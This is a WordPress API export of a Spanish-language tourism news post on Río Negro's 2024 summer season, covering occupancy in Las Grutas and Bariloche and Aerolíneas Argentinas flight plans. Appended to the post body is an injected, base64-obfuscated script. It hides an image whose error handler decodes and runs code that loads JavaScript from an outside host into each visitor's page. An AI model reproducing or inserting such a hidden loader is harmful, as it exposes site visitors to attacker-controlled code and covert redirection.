{"id":7809,"date":"2024-01-12T09:45:24","date_gmt":"2024-01-12T12:45:24","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7809"},"modified":"2025-08-13T15:48:37","modified_gmt":"2025-08-13T18:48:37","slug":"rio-negro-atraviesa-una-buena-temporada-de-verano","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7809","title":{"rendered":"R\u00edo Negro atraviesa una \u201cbuena temporada\u201d de verano"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-d8fe7de009f78f297c7a6a25b13f57e5\"><em>\u201cEstamos, dependiendo del destino, con mejores n\u00fameros o peores n\u00fameros, pero creo que va a ser una temporada muy positiva\u201d, expres\u00f3 el secretario de Turismo provincial.\u00a0<\/em><\/h4>\n\n\n\n<p>El secretario de Turismo de R\u00edo Negro, Marcos Barberis, afirm\u00f3 este jueves que para la provincia est\u00e1 siendo \u201cuna buena temporada\u201d de verano y que la tendencia permite aventurar que terminar\u00e1 resultando \u201cmuy positiva\u201d, al analizar el comportamiento tur\u00edstico del comienzo de enero.<\/p>\n\n\n\n<p>\u201cEstamos, dependiendo del destino, con mejores n\u00fameros o peores n\u00fameros, pero creo que va a ser una temporada muy positiva\u201d, expres\u00f3 Barberis en su paso por Buenos Aires, donde desarroll\u00f3 una variada agenda que incluy\u00f3 gestiones con las autoridades de Aerol\u00edneas Argentinas.<\/p>\n\n\n\n<p>El secretario precis\u00f3 que en&nbsp;<strong>Las Grutas el nivel de ocupaci\u00f3n \u201cronda el 70% \u201cteniendo en cuenta la gran oferta que hay de servicios en la costa atl\u00e1ntica de R\u00edo Negro, que no s\u00f3lo es Las Grutas sino tambi\u00e9n El C\u00f3ndor, Bah\u00eda Creek, Playas Doradas\u201d.<\/strong><\/p>\n\n\n\n<p><em>El secretario de Turismo de R\u00edo Negro, Marcos Barberis, dialog\u00f3 con T\u00e9lam Radio.&nbsp;<\/em><\/p>\n\n\n\n<p>\u201cY despu\u00e9s en Bariloche, en algunos segmentos como en el de hoteles de cuatro y cinco estrellas, estamos rondando el 80%; en lo hostels tambi\u00e9n y despu\u00e9s en lo que es 3 y 4, estamos en el 72%, 73%\u201d, describi\u00f3.<\/p>\n\n\n\n<p><strong>Sobre Bariloche en particular y la conectividad a\u00e9rea, resalt\u00f3 su condici\u00f3n de \u201cdestino faro para todo lo que es la provincia de Rio Negro\u201d.<\/strong><\/p>\n\n\n\n<p>\u201cUn destino en el cual pongas el avi\u00f3n que pongas despu\u00e9s de un gran trabajo que se hizo desde el Ente mixto de promoci\u00f3n y con una pol\u00edtica de Estado de ir con eventos o de generar contenido para el destino, hizo que Bariloche pongas un vuelo desde cualquier ciudad y se llene\u201d, manifest\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/12\/65862a6039414_1200.jpg\" alt=\"\" \/><figcaption class=\"wp-element-caption\"><br><em><sup>Refugio San Mart\u00edn en Bariloche \/ Foto: Prensa<\/sup><\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Proyecci\u00f3n de Aerol\u00edneas Argentinas<\/h2>\n\n\n\n<p>Coment\u00f3 que tambi\u00e9n analiz\u00f3 con las autoridades de la compa\u00f1\u00eda de bandera el flujo de vuelos con Viedma y destac\u00f3 la confirmaci\u00f3n de que&nbsp;<strong>en el invierno pr\u00f3ximo contar\u00e1n con 7 vuelos directos desde Brasil.<\/strong><\/p>\n\n\n\n<p>\u201cEstamos trabajando para conectividad de otros destinos y ver c\u00f3mo seguimos con la conectividad que tiene Aerol\u00edneas por medio de Aeroparque con los vuelos internacionales que llega entonces estamos muy contentos con el acompa\u00f1amiento que tenemos de Aerol\u00edneas\u201d, se\u00f1al\u00f3.<\/p>\n\n\n\n<p>De acuerdo con los datos oficiales, en 2019, Bariloche tuvo un tr\u00e1nsito de 1.848.933 pasajeros de cabotaje e internacionales; 472.956 en 2020; 1.110.504 en 2021; 1.983.602 en el a\u00f1o 2022 y un total de 2.534.288 en 2023, con un promedio de ocupaci\u00f3n del 80% y picos de hasta el 93% en el \u00faltimo periodo.<\/p>\n\n\n\n<p><strong>Estas cifras han posibilitado a Aerol\u00edneas, planificar el 2024 con refuerzos de temporada, sosteniendo rutas nacionales e internacionales y sumar nuevas conexiones con Porto Alegre y Porto Seguro que se suman a Brasilia y San Pablo durante el invierno pr\u00f3ximo.<\/strong><\/p>\n\n\n\n<p>En tanto, los aterrizajes y despegues en Viedma llegaron a 900 el pasado a\u00f1o y generaron un registro de 38.000 pasajeros embarcados y desembarcados, lo que permite proyectar la suma de frecuencias semanales hacia el destino viedmense.<\/p>\n\n\n\n<p>En este verano 2024, seg\u00fan el parte oficial, enero tambi\u00e9n cuenta con guarismos alentadores que proporciona la Autoridad Nacional de Aviaci\u00f3n Civil (ANAC): 762 ser\u00e1n los vuelos que arribar\u00e1n a Bariloche (+7,93% que en enero de 2023). 451 de Aerol\u00edneas Argentinas, 163 de Flybondi, 96 de Jet Smart, 36 de Andes, 16 de Sky provenientes de los principales centros emisores como Buenos Aires, C\u00f3rdoba, El Calafate, Mendoza, Rosario y Santiago de Chile.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"103\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg\" alt=\"\" class=\"wp-image-7468\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-768x77.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-696x70.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-320x32.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-480x48.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-800x80.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg 1067w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cEstamos, dependiendo del destino, con mejores n\u00fameros o peores n\u00fameros, pero creo que va a ser una temporada muy positiva\u201d, expres\u00f3 el secretario de Turismo provincial.\u00a0 El secretario de Turismo de R\u00edo Negro, Marcos Barberis, afirm\u00f3 este jueves que para la provincia est\u00e1 siendo \u201cuna buena temporada\u201d de verano y que la tendencia permite aventurar [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7810,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,21,15],"tags":[],"class_list":["post-7809","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-patagonia","category-turismo-de-bienestar"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7809","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7809"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7809\/revisions"}],"predecessor-version":[{"id":10233,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7809\/revisions\/10233"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7810"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7809"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7809"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7809"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}